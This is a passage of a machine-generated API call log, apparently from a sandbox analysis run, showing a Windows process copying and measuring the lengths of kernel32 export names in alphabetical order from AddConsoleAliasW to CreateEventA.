[0182.349] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0182.349] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0182.349] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0182.349] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0182.349] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0182.349] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0182.349] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0182.349] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0182.349] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0182.349] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0182.350] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0182.350] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0182.350] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0182.350] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0182.350] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0182.350] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0182.350] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0182.350] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0182.350] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0182.350] lstrlenA (lpString="BACKUPREAD") returned 10 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0182.350] lstrlenA (lpString="BACKUPSEEK") returned 10 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0182.350] lstrlenA (lpString="BACKUPWRITE") returned 11 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0182.350] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0182.350] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0182.350] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0182.350] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0182.350] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0182.350] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0182.350] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0182.351] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0182.351] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0182.351] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0182.351] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0182.351] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0182.351] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0182.351] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0182.351] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0182.351] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0182.351] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0182.351] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0182.351] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0182.351] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0182.351] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0182.351] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0182.351] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0182.351] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0182.351] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0182.352] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0182.352] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0182.352] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0182.352] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0182.352] lstrlenA (lpString="BEEP") returned 4 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0182.352] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0182.352] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0182.352] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0182.352] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0182.352] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0182.352] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0182.352] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0182.352] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0182.352] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0182.352] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0182.352] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0182.352] lstrlenA (lpString="CANCELIO") returned 8 [0182.352] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0182.353] lstrlenA (lpString="CANCELIOEX") returned 10 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0182.353] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0182.353] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0182.353] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0182.353] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0182.353] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0182.353] lstrlenA (lpString="CHECKELEVATION") returned 14 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0182.353] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0182.353] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0182.353] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0182.353] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0182.353] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0182.353] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0182.353] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0182.353] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0182.353] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0182.353] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0182.353] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0182.354] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0182.355] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0182.355] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0182.355] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0182.355] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0182.355] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0182.355] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0182.355] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0182.355] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0182.355] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0182.355] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0182.355] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0182.355] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0182.355] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0182.355] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0182.355] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0182.355] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0182.355] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0182.356] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0182.356] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0182.356] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0182.356] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0182.356] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0182.356] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0182.356] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0182.356] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0182.356] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0182.356] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0182.356] lstrlenA (lpString="COPYCONTEXT") returned 11 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0182.356] lstrlenA (lpString="COPYFILEA") returned 9 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0182.356] lstrlenA (lpString="COPYFILEEXA") returned 11 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0182.356] lstrlenA (lpString="COPYFILEEXW") returned 11 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0182.356] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0182.356] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0182.356] lstrlenA (lpString="COPYFILEW") returned 9 [0182.356] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0182.357] lstrlenA (lpString="COPYLZFILE") returned 10 [0182.357] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0182.357] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0182.357] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0182.357] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0182.357] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0182.357] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0182.357] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0182.357] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0182.357] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0182.358] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0182.358] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0182.358] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0182.358] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0182.358] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0182.358] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0182.358] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0182.358] lstrlenA (lpString="CREATEEVENTA") returned 12 [0182.358] lstrcpyA (in: 